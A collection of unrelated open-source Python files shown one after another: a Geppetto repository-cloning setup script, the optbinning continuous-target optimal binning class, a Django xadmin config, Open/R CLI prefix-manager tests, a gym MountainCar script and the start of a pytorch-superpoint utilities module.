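        new_module.appendChild(pom.createTextNode("../" + repo_name))
        modules.appendChild(new_module)
    return pom.toxml()

# _demo_add_module("org.geppetto.model") returns the pom with a second <module> entry,
# while _demo_add_module("org.geppetto.core") leaves it unchanged.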
def main(argv):
yes = set(['yes','y'])
if argv:
target_dir = argv[0]
else:
target_dir = os.path.abspath(config['sourcesdir'])
if not os.path.isdir(target_dir):
raise IOError("Geppetto sources folder does not exist, create it and set the sourcesdir field in config.json: \"" + target_dir + "\"")
print("Copying Geppetto repositories into", target_dir)
print("Would you like to customise your repositories? [y/n]")
custom_repo = input().lower()
if custom_repo in yes:
for repo in config['repos']:
if repo['auto_install'] == "yes":
print("Geppetto repository cloned by default", repo['url'])
if repo['name'] == 'geppetto-application':
# subprocess.call(['rm', '-rf', 'webapp'], cwd=os.path.join(target_dir, 'org.geppetto.frontend/src/main'))
subprocess.call(['git', 'clone', repo['url'], 'webapp'], cwd=os.path.join(target_dir, 'org.geppetto.frontend/src/main'))
else:
subprocess.call(['git', 'clone', repo['url']], cwd = target_dir)
#Once the repos are cloned, write to pom.xml
writeToPomXML(repo)
writeToPlan(repo)
else:
print("Geppetto repository not cloned by default", repo['url'])
print("Would you like to clone this repository? [y/n]")
repository = input().lower()
if repository in yes:
subprocess.call(['git', 'clone', repo['url']], cwd=target_dir)
writeToPomXML(repo)
writeToPlan(repo)
else:
for repo in config['repos']:
if repo['auto_install'] == "yes":
print("Geppetto repository cloned by default", repo['url'])
if repo['name'] == 'geppetto-application':
# subprocess.call(['rm', '-rf', 'webapp'], cwd=os.path.join(target_dir, 'org.geppetto.frontend/src/main'))
subprocess.call(['git', 'clone', repo['url'], 'webapp'], cwd=os.path.join(target_dir, 'org.geppetto.frontend/src/main'))
else:
subprocess.call(['git', 'clone', repo['url']], cwd = target_dir)
#Once the repos are cloned, write to pom.xml
writeToPomXML(repo)
writeToPlan(repo)
#Then add the new repo into geppetto.plan and pom.xml
print("All Geppetto repositories cloned")
if __name__ == "__main__":
main(sys.argv[1:])
|
optbinning/binning/continuous_binning.py
|
jensgk/optbinning
| 207 |
101599
|
"""
Optimal binning algorithm for continuous target.
"""
# <NAME> <<EMAIL>>
# Copyright (C) 2019
import numbers
import time
from sklearn.utils import check_array
import numpy as np
from ..information import solver_statistics
from ..logging import Logger
from .auto_monotonic import auto_monotonic_continuous
from .auto_monotonic import peak_valley_trend_change_heuristic
from .binning import OptimalBinning
from .binning_statistics import continuous_bin_info
from .binning_statistics import ContinuousBinningTable
from .binning_statistics import target_info_special_continuous
from .continuous_cp import ContinuousBinningCP
from .preprocessing import preprocessing_user_splits_categorical
from .preprocessing import split_data
from .transformations import transform_continuous_target
logger = Logger(__name__).logger
def _check_parameters(name, dtype, prebinning_method, max_n_prebins,
min_prebin_size, min_n_bins, max_n_bins, min_bin_size,
max_bin_size, monotonic_trend, min_mean_diff, max_pvalue,
max_pvalue_policy, outlier_detector, outlier_params,
cat_cutoff, user_splits, user_splits_fixed,
special_codes, split_digits, time_limit, verbose):
if not isinstance(name, str):
raise TypeError("name must be a string.")
if dtype not in ("categorical", "numerical"):
raise ValueError('Invalid value for dtype. Allowed string '
'values are "categorical" and "numerical".')
if prebinning_method not in ("cart", "quantile", "uniform"):
raise ValueError('Invalid value for prebinning_method. Allowed string '
'values are "cart", "quantile" and "uniform".')
if not isinstance(max_n_prebins, numbers.Integral) or max_n_prebins <= 1:
raise ValueError("max_n_prebins must be an integer greater than 1; "
"got {}.".format(max_n_prebins))
if not 0. < min_prebin_size <= 0.5:
raise ValueError("min_prebin_size must be in (0, 0.5]; got {}."
.format(min_prebin_size))
if min_n_bins is not None:
if not isinstance(min_n_bins, numbers.Integral) or min_n_bins <= 0:
raise ValueError("min_n_bins must be a positive integer; got {}."
.format(min_n_bins))
if max_n_bins is not None:
if not isinstance(max_n_bins, numbers.Integral) or max_n_bins <= 0:
raise ValueError("max_n_bins must be a positive integer; got {}."
.format(max_n_bins))
if min_n_bins is not None and max_n_bins is not None:
if min_n_bins > max_n_bins:
raise ValueError("min_n_bins must be <= max_n_bins; got {} <= {}."
.format(min_n_bins, max_n_bins))
if min_bin_size is not None:
if (not isinstance(min_bin_size, numbers.Number) or
not 0. < min_bin_size <= 0.5):
raise ValueError("min_bin_size must be in (0, 0.5]; got {}."
.format(min_bin_size))
if max_bin_size is not None:
if (not isinstance(max_bin_size, numbers.Number) or
not 0. < max_bin_size <= 1.0):
raise ValueError("max_bin_size must be in (0, 1.0]; got {}."
.format(max_bin_size))
if min_bin_size is not None and max_bin_size is not None:
if min_bin_size > max_bin_size:
raise ValueError("min_bin_size must be <= max_bin_size; "
"got {} <= {}.".format(min_bin_size,
max_bin_size))
if monotonic_trend is not None:
if monotonic_trend not in ("auto", "auto_heuristic", "auto_asc_desc",
"ascending", "descending", "convex",
"concave", "peak", "valley",
"peak_heuristic", "valley_heuristic"):
raise ValueError('Invalid value for monotonic trend. Allowed '
'string values are "auto", "auto_heuristic", '
'"auto_asc_desc", "ascending", "descending", '
'"concave", "convex", "peak", "valley", '
'"peak_heuristic" and "valley_heuristic".')
if (not isinstance(min_mean_diff, numbers.Number) or min_mean_diff < 0):
raise ValueError("min_mean_diff must be >= 0; got {}."
.format(min_mean_diff))
if max_pvalue is not None:
if (not isinstance(max_pvalue, numbers.Number) or
not 0. < max_pvalue <= 1.0):
raise ValueError("max_pvalue must be in (0, 1.0]; got {}."
.format(max_pvalue))
if max_pvalue_policy not in ("all", "consecutive"):
raise ValueError('Invalid value for max_pvalue_policy. Allowed string '
'values are "all" and "consecutive".')
if outlier_detector is not None:
if outlier_detector not in ("range", "zscore"):
raise ValueError('Invalid value for outlier_detector. Allowed '
'string values are "range" and "zscore".')
if outlier_params is not None:
if not isinstance(outlier_params, dict):
raise TypeError("outlier_params must be a dict or None; "
"got {}.".format(outlier_params))
if cat_cutoff is not None:
if (not isinstance(cat_cutoff, numbers.Number) or
not 0. < cat_cutoff <= 1.0):
raise ValueError("cat_cutoff must be in (0, 1.0]; got {}."
.format(cat_cutoff))
if user_splits is not None:
if not isinstance(user_splits, (np.ndarray, list)):
raise TypeError("user_splits must be a list or numpy.ndarray.")
if user_splits_fixed is not None:
if user_splits is None:
raise ValueError("user_splits must be provided.")
else:
if not isinstance(user_splits_fixed, (np.ndarray, list)):
raise TypeError("user_splits_fixed must be a list or "
"numpy.ndarray.")
elif not all(isinstance(s, bool) for s in user_splits_fixed):
raise ValueError("user_splits_fixed must be list of boolean.")
elif len(user_splits) != len(user_splits_fixed):
raise ValueError("Inconsistent length of user_splits and "
"user_splits_fixed: {} != {}. Lengths must "
"be equal".format(len(user_splits),
len(user_splits_fixed)))
if special_codes is not None:
if not isinstance(special_codes, (np.ndarray, list, dict)):
raise TypeError("special_codes must be a dict, list or "
"numpy.ndarray.")
if isinstance(special_codes, dict) and not len(special_codes):
raise ValueError("special_codes empty. special_codes dict must "
"contain at least one special.")
if split_digits is not None:
if (not isinstance(split_digits, numbers.Integral) or
not 0 <= split_digits <= 8):
raise ValueError("split_digits must be an integer in [0, 8]; "
"got {}.".format(split_digits))
if not isinstance(time_limit, numbers.Number) or time_limit < 0:
raise ValueError("time_limit must be a positive value in seconds; "
"got {}.".format(time_limit))
if not isinstance(verbose, bool):
raise TypeError("verbose must be a boolean; got {}.".format(verbose))
class ContinuousOptimalBinning(OptimalBinning):
"""Optimal binning of a numerical or categorical variable with respect to a
continuous target.
Parameters
----------
name : str, optional (default="")
The variable name.
dtype : str, optional (default="numerical")
The variable data type. Supported data types are "numerical" for
continuous and ordinal variables and "categorical" for categorical
and nominal variables.
prebinning_method : str, optional (default="cart")
The pre-binning method. Supported methods are "cart" for a CART
decision tree, "quantile" to generate prebins with approximately same
frequency and "uniform" to generate prebins with equal width. Method
"cart" uses `sklearn.tree.DecisionTreeRegressor
<https://scikit-learn.org/stable/modules/generated/sklearn.tree.
DecisionTreeRegressor.html>`_.
max_n_prebins : int (default=20)
The maximum number of bins after pre-binning (prebins).
min_prebin_size : float (default=0.05)
The fraction of minimum number of records for each prebin.
min_n_bins : int or None, optional (default=None)
The minimum number of bins. If None, then ``min_n_bins`` is
a value in ``[0, max_n_prebins]``.
max_n_bins : int or None, optional (default=None)
The maximum number of bins. If None, then ``max_n_bins`` is
a value in ``[0, max_n_prebins]``.
min_bin_size : float or None, optional (default=None)
The fraction of minimum number of records for each bin. If None,
``min_bin_size = min_prebin_size``.
max_bin_size : float or None, optional (default=None)
The fraction of maximum number of records for each bin. If None,
``max_bin_size = 1.0``.
monotonic_trend : str or None, optional (default="auto")
The **mean** monotonic trend. Supported trends are “auto”,
"auto_heuristic" and "auto_asc_desc" to automatically determine the
trend that minimizes the L1-norm using a machine learning classifier,
"ascending", "descending", "concave", "convex", "peak" and
"peak_heuristic" to allow a peak change point, and "valley" and
"valley_heuristic" to allow a valley change point. Trends
"auto_heuristic", "peak_heuristic" and "valley_heuristic" use a
heuristic to determine the change point, and are significantly faster
for large instances (``max_n_prebins > 20``). Trend "auto_asc_desc"
is used to automatically select the best monotonic trend between
"ascending" and "descending". If None, then the monotonic constraint
is disabled.
min_mean_diff : float, optional (default=0)
The minimum mean difference between consecutive bins. This
option currently only applies when ``monotonic_trend`` is "ascending"
or "descending".
max_pvalue : float or None, optional (default=0.05)
The maximum p-value among bins. The T-test is used to detect bins
not satisfying the p-value constraint.
max_pvalue_policy : str, optional (default="consecutive")
The method to determine bins not satisfying the p-value constraint.
Supported methods are "consecutive" to compare consecutive bins and
"all" to compare all bins.
outlier_detector : str or None, optional (default=None)
The outlier detection method. Supported methods are "range" to use
the interquartile range based method or "zcore" to use the modified
Z-score method.
outlier_params : dict or None, optional (default=None)
Dictionary of parameters to pass to the outlier detection method.
cat_cutoff : float or None, optional (default=None)
Generate bin others with categories in which the fraction of
occurrences is below the ``cat_cutoff`` value. This option is
available when ``dtype`` is "categorical".
user_splits : array-like or None, optional (default=None)
The list of pre-binning split points when ``dtype`` is "numerical" or
the list of prebins when ``dtype`` is "categorical".
user_splits_fixed : array-like or None (default=None)
The list of pre-binning split points that must be fixed.
special_codes : array-like, dict or None, optional (default=None)
List of special codes. Use special codes to specify the data values
that must be treated separately.
split_digits : int or None, optional (default=None)
The significant digits of the split points. If ``split_digits`` is set
to 0, the split points are integers. If None, then all significant
digits in the split points are considered.
time_limit : int (default=100)
The maximum time in seconds to run the optimization solver.
verbose : bool (default=False)
Enable verbose output.
**prebinning_kwargs : keyword arguments
The pre-binning keyword arguments.
.. versionadded:: 0.6.1
Notes
-----
The parameter values ``max_n_prebins`` and ``min_prebin_size`` control
complexity and memory usage. The default values generally produce quality
results, however, some improvement can be achieved by increasing
``max_n_prebins`` and/or decreasing ``min_prebin_size``.
The T-test uses an estimate of the standard deviation of the contingency
table to speed up the model generation and reduce memory usage. Therefore,
it is not guaranteed to obtain bins satisfying the p-value constraint,
although it may work reasonably well in most cases. To avoid having bins
with similar means, the parameter ``min_mean_diff`` is recommended.
"""
def __init__(self, name="", dtype="numerical", prebinning_method="cart",
max_n_prebins=20, min_prebin_size=0.05, min_n_bins=None,
max_n_bins=None, min_bin_size=None, max_bin_size=None,
monotonic_trend="auto", min_mean_diff=0, max_pvalue=None,
max_pvalue_policy="consecutive", outlier_detector=None,
outlier_params=None, cat_cutoff=None, user_splits=None,
user_splits_fixed=None, special_codes=None, split_digits=None,
time_limit=100, verbose=False, **prebinning_kwargs):
self.name = name
self.dtype = dtype
self.prebinning_method = prebinning_method
self.solver = "cp"
self.max_n_prebins = max_n_prebins
self.min_prebin_size = min_prebin_size
self.min_n_bins = min_n_bins
self.max_n_bins = max_n_bins
self.min_bin_size = min_bin_size
self.max_bin_size = max_bin_size
self.monotonic_trend = monotonic_trend
self.min_mean_diff = min_mean_diff
self.max_pvalue = max_pvalue
self.max_pvalue_policy = max_pvalue_policy
self.outlier_detector = outlier_detector
self.outlier_params = outlier_params
self.cat_cutoff = cat_cutoff
self.user_splits = user_splits
self.user_splits_fixed = user_splits_fixed
self.special_codes = special_codes
self.split_digits = split_digits
self.time_limit = time_limit
self.verbose = verbose
self.prebinning_kwargs = prebinning_kwargs
# auxiliary
self._categories = None
self._cat_others = None
self._n_records = None
self._sums = None
self._stds = None
self._min_target = None
self._max_target = None
self._n_zeros = None
self._n_records_cat_others = None
self._n_records_missing = None
self._n_records_special = None
self._sum_cat_others = None
self._sum_special = None
self._sum_missing = None
self._std_cat_others = None
self._std_special = None
self._std_missing = None
self._min_target_missing = None
self._min_target_special = None
self._min_target_others = None
self._max_target_missing = None
self._max_target_special = None
self._max_target_others = None
self._n_zeros_missing = None
self._n_zeros_special = None
self._n_zeros_others = None
self._problem_type = "regression"
# info
self._binning_table = None
self._n_prebins = None
self._n_refinements = 0
self._n_samples = None
self._optimizer = None
self._splits_optimal = None
self._status = None
# timing
self._time_total = None
self._time_preprocessing = None
self._time_prebinning = None
self._time_solver = None
self._time_optimizer = None
self._time_postprocessing = None
self._is_fitted = False
def fit(self, x, y, check_input=False):
"""Fit the optimal binning according to the given training data.
Parameters
----------
x : array-like, shape = (n_samples,)
Training vector, where n_samples is the number of samples.
y : array-like, shape = (n_samples,)
Target vector relative to x.
check_input : bool (default=False)
Whether to check input arrays.
Returns
-------
self : ContinuousOptimalBinning
Fitted optimal binning.
"""
return self._fit(x, y, check_input)
def fit_transform(self, x, y, metric="mean", metric_special=0,
metric_missing=0, show_digits=2, check_input=False):
"""Fit the optimal binning according to the given training data, then
transform it.
Parameters
----------
x : array-like, shape = (n_samples,)
Training vector, where n_samples is the number of samples.
y : array-like, shape = (n_samples,)
Target vector relative to x.
metric : str (default="mean"):
The metric used to transform the input vector. Supported metrics
are "mean" to choose the mean, "indices" to assign the
corresponding indices of the bins and "bins" to assign the
corresponding bin interval.
metric_special : float or str (default=0)
The metric value to transform special codes in the input vector.
Supported metrics are "empirical" to use the empirical mean, and
any numerical value.
metric_missing : float or str (default=0)
The metric value to transform missing values in the input vector.
Supported metrics are "empirical" to use the empirical mean, and
any numerical value.
show_digits : int, optional (default=2)
The number of significant digits of the bin column. Applies when
``metric="bins"``.
check_input : bool (default=False)
Whether to check input arrays.
Returns
-------
x_new : numpy array, shape = (n_samples,)
Transformed array.
"""
return self.fit(x, y, check_input).transform(
x, metric, metric_special, metric_missing, show_digits,
check_input)
def transform(self, x, metric="mean", metric_special=0, metric_missing=0,
show_digits=2, check_input=False):
"""Transform given data to mean using bins from the fitted
optimal binning.
Parameters
----------
x : array-like, shape = (n_samples,)
Training vector, where n_samples is the number of samples.
metric : str (default="mean"):
The metric used to transform the input vector. Supported metrics
are "mean" to choose the mean, "indices" to assign the
corresponding indices of the bins and "bins" to assign the
corresponding bin interval.
metric_special : float or str (default=0)
The metric value to transform special codes in the input vector.
Supported metrics are "empirical" to use the empirical mean, and
any numerical value.
metric_missing : float or str (default=0)
The metric value to transform missing values in the input vector.
Supported metrics are "empirical" to use the empirical mean, and
any numerical value.
show_digits : int, optional (default=2)
The number of significant digits of the bin column. Applies when
``metric="bins"``.
check_input : bool (default=False)
Whether to check input arrays.
Returns
-------
x_new : numpy array, shape = (n_samples,)
Transformed array.
Notes
-----
Transformation of data including categories not present during training
returns zero mean.
"""
self._check_is_fitted()
return transform_continuous_target(self._splits_optimal, self.dtype,
x, self._n_records, self._sums,
self.special_codes,
self._categories, self._cat_others,
metric, metric_special,
metric_missing, self.user_splits,
show_digits, check_input)
def _fit(self, x, y, check_input):
time_init = time.perf_counter()
if self.verbose:
logger.info("Optimal binning started.")
logger.info("Options: check parameters.")
_check_parameters(**self.get_params())
# Pre-processing
if self.verbose:
logger.info("Pre-processing started.")
self._n_samples = len(x)
if self.verbose:
logger.info("Pre-processing: number of samples: {}"
.format(self._n_samples))
time_preprocessing = time.perf_counter()
[x_clean, y_clean, x_missing, y_missing, x_special, y_special,
y_others, categories, cat_others, _, _, _, _] = split_data(
self.dtype, x, y, self.special_codes, self.cat_cutoff,
self.user_splits, check_input, self.outlier_detector,
self.outlier_params)
self._time_preprocessing = time.perf_counter() - time_preprocessing
if self.verbose:
n_clean = len(x_clean)
n_missing = len(x_missing)
n_special = len(x_special)
logger.info("Pre-processing: number of clean samples: {}"
.format(n_clean))
logger.info("Pre-processing: number of missing samples: {}"
.format(n_missing))
logger.info("Pre-processing: number of special samples: {}"
.format(n_special))
if self.outlier_detector is not None:
n_outlier = self._n_samples - (n_clean + n_missing + n_special)
logger.info("Pre-processing: number of outlier samples: {}"
.format(n_outlier))
if self.dtype == "categorical":
n_categories = len(categories)
n_categories_others = len(cat_others)
n_others = len(y_others)
logger.info("Pre-processing: number of others samples: {}"
.format(n_others))
logger.info("Pre-processing: number of categories: {}"
.format(n_categories))
logger.info("Pre-processing: number of categories others: {}"
.format(n_categories_others))
logger.info("Pre-processing terminated. Time: {:.4f}s"
.format(self._time_preprocessing))
# Pre-binning
if self.verbose:
logger.info("Pre-binning started.")
time_prebinning = time.perf_counter()
if self.user_splits is not None:
n_splits = len(self.user_splits)
if self.verbose:
logger.info("Pre-binning: user splits supplied: {}"
.format(n_splits))
if not n_splits:
splits = self.user_splits
n_records = np.array([])
sums = np.array([])
stds = np.array([])
else:
if self.dtype == "numerical":
user_splits = check_array(
self.user_splits, ensure_2d=False, dtype=None,
force_all_finite=True)
if len(set(user_splits)) != len(user_splits):
raise ValueError("User splits are not unique.")
sorted_idx = np.argsort(user_splits)
user_splits = user_splits[sorted_idx]
else:
[categories, user_splits, x_clean, y_clean, y_others,
cat_others, _, _, sorted_idx
] = preprocessing_user_splits_categorical(
self.user_splits, x_clean, y_clean, None)
if self.user_splits_fixed is not None:
self.user_splits_fixed = np.asarray(
self.user_splits_fixed)[sorted_idx]
[splits, n_records, sums, ssums, stds, min_t, max_t,
n_zeros] = self._prebinning_refinement(
user_splits, x_clean, y_clean, y_missing, x_special,
y_special, y_others)
else:
[splits, n_records, sums, ssums, stds, min_t, max_t,
n_zeros] = self._fit_prebinning(
x_clean, y_clean, y_missing, x_special, y_special, y_others)
self._n_prebins = len(n_records)
self._categories = categories
self._cat_others = cat_others
self._time_prebinning = time.perf_counter() - time_prebinning
if self.verbose:
logger.info("Pre-binning: number of prebins: {}"
.format(self._n_prebins))
logger.info("Pre-binning terminated. Time: {:.4f}s"
.format(self._time_prebinning))
# Optimization
self._fit_optimizer(splits, n_records, sums, ssums, stds)
# Post-processing
if self.verbose:
logger.info("Post-processing started.")
logger.info("Post-processing: compute binning information.")
time_postprocessing = time.perf_counter()
if not len(splits):
n_records = n_records.sum()
sums = sums.sum()
[self._n_records, self._sums, self._stds, self._min_target,
self._max_target, self._n_zeros] = continuous_bin_info(
self._solution, n_records, sums, ssums, stds, min_t, max_t,
n_zeros, self._n_records_missing, self._sum_missing,
self._std_missing, self._min_target_missing,
self._max_target_missing, self._n_zeros_missing,
self._n_records_special, self._sum_special, self._std_special,
self._min_target_special, self._max_target_special,
self._n_zeros_special, self._n_records_cat_others,
self._sum_cat_others, self._std_cat_others,
self._min_target_others, self._max_target_others,
self._n_zeros_others, self._cat_others)
if self.dtype == "numerical":
min_x = x_clean.min()
max_x = x_clean.max()
else:
min_x = None
max_x = None
self._binning_table = ContinuousBinningTable(
self.name, self.dtype, self.special_codes, self._splits_optimal,
self._n_records, self._sums, self._stds, self._min_target,
self._max_target, self._n_zeros, min_x, max_x, self._categories,
self._cat_others, self.user_splits)
self._time_postprocessing = time.perf_counter() - time_postprocessing
if self.verbose:
logger.info("Post-processing terminated. Time: {:.4f}s"
.format(self._time_postprocessing))
self._time_total = time.perf_counter() - time_init
if self.verbose:
logger.info("Optimal binning terminated. Status: {}. Time: {:.4f}s"
.format(self._status, self._time_total))
# Completed successfully
self._is_fitted = True
return self
def _fit_optimizer(self, splits, n_records, sums, ssums, stds):
if self.verbose:
logger.info("Optimizer started.")
time_init = time.perf_counter()
if len(n_records) <= 1:
self._status = "OPTIMAL"
self._splits_optimal = splits
self._solution = np.zeros(len(splits)).astype(bool)
if self.verbose:
logger.warning("Optimizer: {} bins after pre-binning."
.format(len(n_records)))
logger.warning("Optimizer: solver not run.")
logger.info("Optimizer terminated. Time: 0s")
return
if self.min_bin_size is not None:
min_bin_size = int(np.ceil(self.min_bin_size * self._n_samples))
else:
min_bin_size = self.min_bin_size
if self.max_bin_size is not None:
max_bin_size = int(np.ceil(self.max_bin_size * self._n_samples))
else:
max_bin_size = self.max_bin_size
# Monotonic trend
trend_change = None
if self.dtype == "numerical":
auto_monotonic_modes = ("auto", "auto_heuristic", "auto_asc_desc")
if self.monotonic_trend in auto_monotonic_modes:
monotonic = auto_monotonic_continuous(
n_records, sums, self.monotonic_trend)
if self.monotonic_trend == "auto_heuristic":
if monotonic in ("peak", "valley"):
if monotonic == "peak":
monotonic = "peak_heuristic"
else:
monotonic = "valley_heuristic"
mean = sums / n_records
trend_change = peak_valley_trend_change_heuristic(
mean, monotonic)
if self.verbose:
logger.info("Optimizer: classifier predicts {} "
"monotonic trend.".format(monotonic))
else:
monotonic = self.monotonic_trend
if monotonic in ("peak_heuristic", "valley_heuristic"):
mean = sums / n_records
trend_change = peak_valley_trend_change_heuristic(
mean, monotonic)
else:
monotonic = self.monotonic_trend
if monotonic is not None:
monotonic = "ascending"
if self.verbose:
if monotonic is None:
logger.info(
"Optimizer: monotonic trend not set.")
else:
logger.info("Optimizer: monotonic trend set to {}."
.format(monotonic))
optimizer = ContinuousBinningCP(monotonic, self.min_n_bins,
self.max_n_bins, min_bin_size,
max_bin_size, self.min_mean_diff,
self.max_pvalue,
self.max_pvalue_policy,
self.user_splits_fixed,
self.time_limit)
if self.verbose:
logger.info("Optimizer: build model...")
optimizer.build_model(n_records, sums, ssums, trend_change)
if self.verbose:
logger.info("Optimizer: solve...")
status, solution = optimizer.solve()
self._solution = solution
self._optimizer, self._time_optimizer = solver_statistics(
self.solver, optimizer.solver_)
self._status = status
if self.dtype == "categorical" and self.user_splits is not None:
self._splits_optimal = splits[solution]
else:
self._splits_optimal = splits[solution[:-1]]
self._time_solver = time.perf_counter() - time_init
if self.verbose:
logger.info("Optimizer terminated. Time: {:.4f}s"
.format(self._time_solver))
def _prebinning_refinement(self, splits_prebinning, x, y, y_missing,
x_special, y_special, y_others, sw_clean=None,
sw_missing=None, sw_special=None,
sw_others=None):
n_splits = len(splits_prebinning)
if not n_splits:
return splits_prebinning, np.array([]), np.array([])
if self.split_digits is not None:
splits_prebinning = np.round(splits_prebinning, self.split_digits)
if self.dtype == "categorical" and self.user_splits is not None:
indices = np.digitize(x, splits_prebinning, right=True)
n_bins = n_splits
else:
indices = np.digitize(x, splits_prebinning, right=False)
n_bins = n_splits + 1
# Compute n_records, sum and std for special, missing and others
# self._n_records_special = len(y_special)
# self._sum_special = np.sum(y_special)
# self._n_zeros_special = np.count_nonzero(y_special == 0)
# if len(y_special):
# self._std_special = np.std(y_special)
# self._min_target_special = np.min(y_special)
# self._max_target_special = np.max(y_special)
[self._n_records_special, self._sum_special, self._n_zeros_special,
self._std_special, self._min_target_special,
self._max_target_special] = target_info_special_continuous(
self.special_codes, x_special, y_special)
self._n_records_missing = len(y_missing)
self._sum_missing = np.sum(y_missing)
self._n_zeros_missing = np.count_nonzero(y_missing == 0)
if len(y_missing):
self._std_missing = np.std(y_missing)
self._min_target_missing = np.min(y_missing)
self._max_target_missing = np.max(y_missing)
if len(y_others):
self._n_records_cat_others = len(y_others)
self._sum_cat_others = np.sum(y_others)
self._std_cat_others = np.std(y_others)
self._min_target_others = np.min(y_others)
self._max_target_others = np.max(y_others)
self._n_zeros_others = np.count_nonzero(y_others == 0)
n_records = np.empty(n_bins).astype(np.int64)
sums = np.empty(n_bins)
ssums = np.empty(n_bins)
stds = np.empty(n_bins)
n_zeros = np.empty(n_bins).astype(np.int64)
min_t = np.full(n_bins, -np.inf)
max_t = np.full(n_bins, np.inf)
# Compute prebin information
for i in range(n_bins):
mask = (indices == i)
n_records[i] = np.count_nonzero(mask)
ymask = y[mask]
sums[i] = np.sum(ymask)
ssums[i] = np.sum(ymask ** 2)
stds[i] = np.std(ymask)
n_zeros[i] = np.count_nonzero(ymask == 0)
if len(ymask):
min_t[i] = np.min(ymask)
max_t[i] = np.max(ymask)
return (splits_prebinning, n_records, sums, ssums, stds, min_t, max_t,
n_zeros)
@property
def binning_table(self):
"""Return an instantiated binning table. Please refer to
:ref:`Binning table: continuous target`.
Returns
-------
binning_table : ContinuousBinningTable.
"""
self._check_is_fitted()
return self._binning_table
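# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the library). It assumes synthetic
# numpy data; fit/transform follow the API documented above, and build() is
# assumed from the binning table API referenced by `binning_table`.
def _example_continuous_optimal_binning():
    import numpy as np
    rng = np.random.RandomState(0)
    x = rng.uniform(0, 10, size=1000)
    y = 2.0 * x + rng.normal(scale=1.0, size=1000)  # continuous target
    optb = ContinuousOptimalBinning(name="x", dtype="numerical")
    optb.fit(x, y)
    # Transform new data to the mean of the assigned bin.
    x_mean = optb.transform(x, metric="mean")
    # The binning table summarizes records, sums and means per bin.
    table = optb.binning_table.build()
    return x_mean, table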
|
server/apps/movie/adminx.py
|
Mayandev/django_morec
| 129 |
101656
|
<filename>server/apps/movie/adminx.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019-04-19 20:45
# @Author : Mayandev
# @Site : https://github.com/Mayandev/
# @File : adminx.py
# @Software: PyCharm
import xadmin
from .models import Movie, Genre
class MovieAdmin(object):
list_display = ['id', 'closest_movie', 'doubanId']
model_icon = 'fa fa-ticket'
class GenreAdmin(object):
list_display = ['id', 'genre']
model_icon = 'fa fa-ticket'
xadmin.site.register(Movie, MovieAdmin)
xadmin.site.register(Genre, GenreAdmin)
|
openr/py/openr/cli/tests/prefixmgr/tests.py
|
nathanawmk/openr
| 880 |
101662
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
from typing import Optional
from unittest.mock import MagicMock, patch
from click.testing import CliRunner
from later.unittest import TestCase
from openr.cli.clis import prefix_mgr
from openr.cli.tests import helpers
from .fixtures import (
MOCKED_ADVERTISED_ROUTES,
ADVERTISED_ROUTES_OUTPUT,
ADVERTISED_ROUTES_OUTPUT_DETAILED,
ADVERTISED_ROUTES_OUTPUT_JSON,
)
BASE_MODULE = "openr.cli.clis.prefix_mgr"
BASE_CMD_MODULE = "openr.cli.commands.prefix_mgr"
class CliPrefixManagerTests(TestCase):
maxDiff: Optional[int] = None
def setUp(self) -> None:
self.runner = CliRunner()
def test_help(self) -> None:
invoked_return = self.runner.invoke(
prefix_mgr.PrefixMgrCli.prefixmgr,
["--help"],
catch_exceptions=False,
)
self.assertEqual(0, invoked_return.exit_code)
@patch(helpers.COMMANDS_GET_OPENR_CTRL_CLIENT)
def test_prefixmgr_advertised_routes(self, mocked_openr_client: MagicMock) -> None:
# Set mock data for testing
mocked_returned_connection = helpers.get_enter_thrift_magicmock(
mocked_openr_client
)
mocked_returned_connection.getAdvertisedRoutesFiltered.return_value = (
MOCKED_ADVERTISED_ROUTES
)
# Invoke with no flags & verify output
invoked_return = self.runner.invoke(
prefix_mgr.AdvertisedRoutesCli.show,
["all"],
catch_exceptions=False,
)
self.assertEqual(0, invoked_return.exit_code)
self.assertEqual(ADVERTISED_ROUTES_OUTPUT, invoked_return.stdout)
# Invoke with [--detail] & verify output
invoked_return = self.runner.invoke(
prefix_mgr.AdvertisedRoutesCli.show,
["--detail", "all"],
catch_exceptions=False,
)
self.assertEqual(0, invoked_return.exit_code)
self.assertEqual(ADVERTISED_ROUTES_OUTPUT_DETAILED, invoked_return.stdout)
# Invoke with [--json] & verify output
invoked_return = self.runner.invoke(
prefix_mgr.AdvertisedRoutesCli.show,
["--json", "all"],
catch_exceptions=False,
)
self.assertEqual(0, invoked_return.exit_code)
self.assertEqual(ADVERTISED_ROUTES_OUTPUT_JSON, invoked_return.stdout)
|
rl/test.py
|
fancyerii/blog-codes
| 159 |
101668
|
<gh_stars>100-1000
import gym
import numpy as np
from matplotlib import pyplot as plt
env = gym.envs.make("MountainCar-v0")
env.reset()
plt.figure()
plt.imshow(env.render(mode='rgb_array'))
for x in range(1000):
env.step(1)
plt.figure()
plt.imshow(env.render(mode='rgb_array'))
env.render(close=False)
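# Minimal interaction-loop sketch (assumes the classic gym API in which
# step() returns (obs, reward, done, info)); added for illustration only.
def run_random_episode(env_name="MountainCar-v0", max_steps=200):
    env = gym.envs.make(env_name)
    obs = env.reset()
    total_reward = 0.0
    for _ in range(max_steps):
        action = env.action_space.sample()  # random policy
        obs, reward, done, info = env.step(action)
        total_reward += reward
        if done:
            break
    env.close()
    return total_reward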
|
utils/utils.py
|
Dai-z/pytorch-superpoint
| 390 |
101683
|
"""util functions
# many old functions, need to clean up
# homography --> homography
# warping
# loss --> delete if useless
"""
import numpy as np
import torch
from pathlib import Path
import datetime
from collections import OrderedDict
import torch.nn.functional as F
import torch.nn as nn
###### check
# from utils.nms_pytorch import box_nms as box_nms_retinaNet
from utils.d2s import DepthToSpace, SpaceToDepth
def img_overlap(img_r, img_g, img_gray): # img_b repeat
def to_3d(img):
if len(img.shape) == 2:
img = img[np.newaxis, ...]
return img
img_r, img_g, img_gray = to_3d(img_r), to_3d(img_g), to_3d(img_gray)
img = np.concatenate((img_gray, img_gray, img_gray), axis=0)
img[0, :, :] += img_r[0, :, :]
img[1, :, :] += img_g[0, :, :]
img[img > 1] = 1
img[img < 0] = 0
return img
def thd_img(img, thd=0.015):
img[img < thd] = 0
img[img >= thd] = 1
return img
def toNumpy(tensor):
return tensor.detach().cpu().numpy()
def save_path_formatter(args, parser):
print("todo: save path")
return Path('.')
pass
'''
def save_path_formatter(args, parser):
